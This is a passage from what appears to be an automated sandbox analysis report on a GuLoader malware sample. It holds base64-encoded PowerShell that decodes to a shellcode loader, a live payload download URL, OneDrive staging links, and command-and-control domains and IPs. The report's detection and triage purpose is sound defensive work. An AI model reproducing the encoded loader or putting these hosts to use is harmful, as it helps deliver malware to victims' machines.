IABTAFAASQBEAFMASwBBAEEATAAgAEwAdQByAGUANwAgAEwAYQBkAG4AaQAgAE8AVgBFAFIAUgBLACAATABZAEMAVQBTAFQAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAGQAbwB0AHIAaQBhAGMAbwBuADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGcAZABpADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0ARgBvAG4AdABzAEEAKABzAHQAcgBpAG4AZwAgAEEAcgB0AGgAcgBvAGMAbAA5ACwAdQBpAG4AdAAgAGEAcgByAGEAeQAsAGkAbgB0ACAARgBJAEYAVQBMAFIARABFAEkALABpAG4AdAAgAGQAbwB0AHIAaQBhAGMAbwBuADAALABpAG4AdAAgAFMASwBSAE8AVABQAFIALABpAG4AdAAgAEMAYQBzAHMAaQBkAGkAZAAsAGkAbgB0ACAAVQBuAGEAbgBuAGUAYQBsAGUANQApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAEsARQBSAE4ARQBMADMAMgAiACwAIABFAG4AdAByAHkAUABvAGkAbgB0AD0AIgBDAHIAZQBhAHQAZQBGAGkAbABlAEEAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAYQBjACgAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBMAFAAUwB0AHIAKQBdAHMAdAByAGkAbgBnACAAQQByAHQAaAByAG8AYwBsADkALAB1AGkAbgB0ACAAYQByAHIAYQB5ACwAaQBuAHQAIABGAEkARgBVAEwAUgBEAEUASQAsAGkAbgB0ACAAZABvAHQAcgBpAGEAYwBvAG4AMAAsAGkAbgB0ACAAUwBLAFIATwBUAFAAUgAsAGkAbgB0ACAAQwBhAHMAcwBpAGQAaQBkACwAaQBuAHQAIABVAG4AYQBuAG4AZQBhAGwAZQA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABkAG8AdAByAGkAYQBjAG8AbgA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGMAZQBhAG4AbwBsAG8ANgAsAGkAbgB0ACAATQByAGsAbABnACwAcgBlAGYAIABJAG4AdAAzADIAIABkAG8AdAByAGkAYQBjAG8AbgAsAGkAbgB0ACAARABFAEMASQBQAEgALABpAG4AdAAgAGQAbwB0AHIAaQBhAGMAbwBuADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAUgBlAGEAZABGAGkAbABlACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAQwBEAEEAQwAoAGkAbgB0ACAATQByAGsAbABnADAALAB1AGkAbgB0ACAATQByAGsAbABnADEALABJAG4AdABQAHQAcgAgAE0AcgBrAGwAZwAyACwAcgBlAGYAIABJAG4AdAAzADIAIABNAHIAawBsAGcAMwAsAGkAbgB0ACAATQByAGsAbABnADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAEkAbgB0AFAAdAByACAATQByAGsAbABnADUALABpAG4AdAAgAE0AcgBrAGwAZwA2ACkAOwANAAoADQAKAH0ADQAKACIAQAANAAoAIwBNAGkAYQBzAG0AIABQAHMAZQB1AGQAbwBzADkAIABLAG8AbgBkAG8AbABlAG4AYwA4ACAAcgBlAHAAcgBvACAASQBuAHQAZQBnADUAIABTAGsAdQBtAHIAOAAgAEUAUgBHAE8ARABJAEMASQAgAEsAQQBWAEEAIAB5AG4AZABpAGcAZQByACAATABuAHUAZAB2AGkAawBsAGkAOQAgAGcAYQBzAGIAbwByACAAcgB1AG4AZABlAHMAYQAgAFcAZQBhAHAAIABBAEUAUgBPAEQAVQBDAFQAUwBWACAAUwB2AGkAbgBlADMAIABLAHUAbABsAGEAZwByAGUAcwA4ACAARgBvAHIAcwB0AGEAYQBlAGwANwAgAHMAaAByAHUAZwBnAGkAbgAgAEcAUgBVAFMATwBNACAAQgBhAHMAaQBzAHUAZABkAGEAbgAgAFAATgBFAFUATQAgAEQAUgBBAEEAQgBFAEkATgAgAA0ACgAkAGQAbwB0AHIAaQBhAGMAbwBuADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAFAAVABFAFIATwBTAFQASQAuAGQAYQB0ACIADQAKACMAUwB0AHIAYQBrACAAUgBlAGcAaQBzAHQAcgBhAG4AdAAgAGoAbwBnAG4AaQBuAGcAcwAgAGMAbwByAG4AdQAgAEYAYQBrAHQAdQByAGEAYgAgAEQAZQBzAGUAcgB0ADgAIABLAEEATgBEAEkAIABTAGkAZQBnAGUAZABnAGkAZgB0ADYAIABQAHIAZQBjAGkAIAB2AGUAcwBpAGMAbwAgAHYAZQBqAHIAZgBvAHIAIAANAAoAJABkAG8AdAByAGkAYQBjAG8AbgAzAD0AMAA7AA0ACgAkAGQAbwB0AHIAaQBhAGMAbwBuADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAZABvAHQAcgBpAGEAYwBvAG4AOAA9AFsAZABvAHQAcgBpAGEAYwBvAG4AMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABkAG8AdAByAGkAYQBjAG8AbgAzACwAMAAsAFsAcgBlAGYAXQAkAGQAbwB0AHIAaQBhAGMAbwBuADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBQAGwAZQB0ADcAIABFAGsAcwBpAGwAcgBiAG8AcgAyACAARwByAGkAbQBtACAAUAByAG8AcwBlAGMAdABpADMAIABEAEUATgBJAFoARABJAE0AIABCAHIAbQBtAGUAcgAgAEEAZAB2AG8AawBhAHQANgAgAFQAYQByAGUAMQAgAFAAYQBhAHQAYQBnAGUAIABpAG0AcABsAGUAbQAgAFUAbgBhAHMAYwBlAG4AZAA5ACAARgBpAG4AbgA4ACAAQwBPAE0AUABBAFQAIABzAGwAaQBrAG0AdQBuAGQAIABzAGkAcwBoAGEAbQAgAE0ASQBSAEEAQwBMAEUAUwBCACAAQgBlAGwAZABhAG0AcwB0AG8AcgAgAEsAaQBkAG4AYQBwADQAIABTAHUAZABzAGUAcwBwAGEAZwB1ACAAUwBBAEEATABFAEwARABFAFIARQAgAHMAdABhAHQAaQBzAHQAaQAgAEMAZQByAHYAaQBjAGkAcABsACAAUgBpAG0AZQBuAGUAMgAgAEIARQBCAE8ARQBSAEUATAAgAHQAcgBhAG4AcwBzAGsAcgAgAEwAZQB2AG4AZQBkAGUAIABpAHIAcgBlAHAAdAAgAA0ACgAkAGQAbwB0AHIAaQBhAGMAbwBuADQAPQBbAGQAbwB0AHIAaQBhAGMAbwBuADEAXQA6ADoAVgBpAGEAYwAoACQAZABvAHQAcgBpAGEAYwBvAG4AMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBOAE8ATgBFAEwARQAgAFIAZQBlAG0AcABoAGEAcwA4ACAARgBPAFIAQgBFAEQAIABSAEkAQwBJAE4AVQBTAEUAUwBCACAAVQBuAHMAYwBhAGIAYgBlADgAIABkAGkAYQBtAGUAdAAgAEEAbgB0AGgAcgBvAHAAbwBsAG8AIAB2AHIAdABzAGwAYQBuAGQAIABGAGEAcgB2AGUAYgBsAHkAIABBAFUAWABPAFQATwBYAFMASAAgAE4AUgBHAEEAQQBFAE4ASAAgAEQAdQBkAGUAIABSAEkARgBTAFMAVABSAEEARgBGACAAcQB1AGEAbABtACAAUwBVAEQAQQBOAEUAIABHAGUAbgBmAGQAcwBlACAASABvAHYAZQBkAGsAdQBsACAAUABJAEMAQwAgAFAARQBSAEEAQwBJAEQASQBUACAAbABpAHMAdABlACAAVgBFAFIATgBBAEwAIABPAHUAdABiAGEAbABhACAAUwB0AG8AcgAxACAAVwBlAHQAdABhACAAQwBvAGgAZQBzAGkANQAgAGgAagBlAG0AIAByAGEAZABpAG8AZQByAHMAYwBsACAAZQB4AHQAcgBhAHYAYQBzAGEAdAAgAEMAYQBsAHYAZQAgAGEAbgBoAGUAdQAgAEYATwBSAEgAQQBOAEQATAAgAA0ACgAkAGQAbwB0AHIAaQBhAGMAbwBuADUAPQAwADsADQAKACMAUwBsAHkAbgBnAHIAbwBzAGUANwAgAHYAaQBhAGoAYQBjAGEAaQBtAHAAIABCAGUAbABhAHIAaQAgAFMAcAByAGkAbgBnACAASwBlAHIAdQA5ACAAYwBhAHkAdQBjAG8AZgB5AHIAdAAgAEEARgBNAE4AUwBUAFIARQAgAEsASQBUAEMASAAgAFMAcABvAG4AZwBpAG8AcABsAGEANAAgAE8AdgBlAHIAbAAgAGYAbwB1AGUAdAB0AGUAZQBoAGEAIABYAEkAUABIAE8AIABQAG8AbABsAGIAbwBvAGsAdwA5ACAARgByAG8AcwB0AGsAIABQAEgATwBTAFAASABPAEwASQAgAHMAYQBuAGcAZQBsAG4AYQAgAGsAbwBsAGkAYgByACAARgBsAHkAdgBlAGcAcgAgAGIAdQBsAGIAZQBsAG4AZQBkACAATQBvAGQAdABhADcAIABiAGwAZQBzAGsAdQAgAEIAZQBrAGkAcwBzAGkAOAAgAFUARABUAE8ATgBJAE4ARwBFACAAZwByAGQAaQBhAGIAZQB0AGkAawAgAEEAcgBtAGEAIABQAE8ASQBOAEQAIABSAGUAawBlAHkAZQBkAGgAIABvAGIAcwBjAHUAcgBlAHIAIAANAAoAWwBkAG8AdAByAGkAYQBjAG8AbgAxAF0AOgA6AEMARABBAEMAKAAkAGQAbwB0AHIAaQBhAGMAbwBuADQALAAkAGQAbwB0AHIAaQBhAGMAbwBuADMALAA1ADgAMwA0ADYALABbAHIAZQBmAF0AJABkAG8AdAByAGkAYQBjAG8AbgA1ACwAMAApAA0ACgAjAFUAbgBpAG4AdgBlAG4AdABpACAARABEAEQAUgBVAEsASwBFAE4AIABBAHUAcgBhACAAUwB0AHIAZQBsAHQAegBpAGcAYQAgAFYAYQBsAHUAdABhAGwAYQBhACAASQByAHIAZQAxACAAaABlAHIAbABpAGcAIABCAEUAUwBQAE8AVAAgAE8AUABIAEEAVgBTAFIARQBUACAAQgByAGkAbgAgAGYAbwByAGUAcwBlAHQAdABsACAAaABhAGEAcgBkAGYAcgBvAHMAIAANAAoAWwBkAG8AdAByAGkAYQBjAG8AbgAxAF0AOgA6AEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoACQAZABvAHQAcgBpAGEAYwBvAG4AMwAsACAAMAApAA0ACgANAAoA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 4992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Payload URL": "https://vegproworld.com/wp-content/Touchb.vbs"}
SourceRuleDescriptionAuthorStrings
00000001.00000003.3931911051.0000018888A71000.00000004.00000020.00020000.00000000.sdmpSUSP_LNK_SuspiciousCommandsDetects LNK file with suspicious contentFlorian Roth
  • 0x1eaa:$s12: Wscript.Shell
00000009.00000000.4302405352.0000000000630000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000009.00000000.4302405352.0000000000630000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://vegproworld.com/wp-content/Touchb.vbs"}
    Source: PO-19903.vbsReversingLabs: Detection: 19%
    Source: http://pesterbdd.com/images/Pester.pngAvira URL Cloud: Label: malware
    Source: vegproworld.comVirustotal: Detection: 5%Perma Link
    Source: unknownHTTPS traffic detected: 148.66.138.165:443 -> 192.168.11.20:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.43.13:443 -> 192.168.11.20:49739 version: TLS 1.2
    Source: Binary string: $}l8C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.pdb source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp

    Networking

    barindex
    Source: Initial file: Matri11.SaveToFile FileName, adSaveCreateOverWrite
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeDropped file: MILIEUFOR1.SaveToFile FileName, adSaveCreateOverWriteJump to dropped file
    Source: Malware configuration extractorURLs: https://vegproworld.com/wp-content/Touchb.vbs
    Source: unknownDNS query: name: toshiba1122.ddns.net
    Source: unknownDNS query: name: toshiba1122.duckdns.org
    Source: Joe Sandbox ViewASN Name: VCG-ASNG VCG-ASNG
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Joe Sandbox ViewIP Address: 13.107.43.13 13.107.43.13
    Source: Joe Sandbox ViewIP Address: 148.66.138.165 148.66.138.165
    Source: global trafficHTTP traffic detected: GET /wp-content/Touchb.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vegproworld.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304UDXKDuEA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: onedrive.live.comCache-Control: no-cacheCookie: MUID=20718A960FA8687F03949A000BA86C7A
    Source: global trafficTCP traffic: 192.168.11.20:49741 -> 194.5.98.59:3360
    Source: global trafficTCP traffic: 192.168.11.20:49742 -> 197.210.226.45:3360
    Source: global trafficTCP traffic: 192.168.11.20:49752 -> 197.210.226.89:3360
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4413614771.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4414053518.0000000002BD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4413614771.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4414053518.0000000002BD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.4962804666.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000002.00000002.4962804666.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.4973562589.00000000059A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458100390.0000000002B94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jgdbpa.am.files.1drv.com/
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jgdbpa.am.files.1drv.com/y4maRwf2HHiC3pXkJNQF9GW7D5PTiYgoa5jSqqmo4o-s2nHza5cDyEK1j43pCU9Ua1Y
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4444820883.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8459529246.0000000002C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jgdbpa.am.files.1drv.com/y4mstf71DnOKqqDiI505gr5x-9GCiHWv5DdrHG7ALTidojrV4lxxrd7sQ3eLTcarbaq
    Source: powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
    Source: ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/:
    Source: ieinstal.exe, 00000009.00000002.8458100390.0000000002B94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304
    Source: ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/ndows
    Source: ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vegproworld.com/:k
    Source: ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vegproworld.com/rj-$
    Source: ieinstal.exe, 00000009.00000002.8457894075.0000000002B8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vegproworld.com/wp-content/Touchb.vbs
    Source: unknownDNS traffic detected: queries for: vegproworld.com
    Source: global trafficHTTP traffic detected: GET /wp-content/Touchb.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vegproworld.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304UDXKDuEA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: onedrive.live.comCache-Control: no-cacheCookie: MUID=20718A960FA8687F03949A000BA86C7A
    Source: unknownHTTPS traffic detected: 148.66.138.165:443 -> 192.168.11.20:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.43.13:443 -> 192.168.11.20:49739 version: TLS 1.2

    System Summary

    barindex
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAA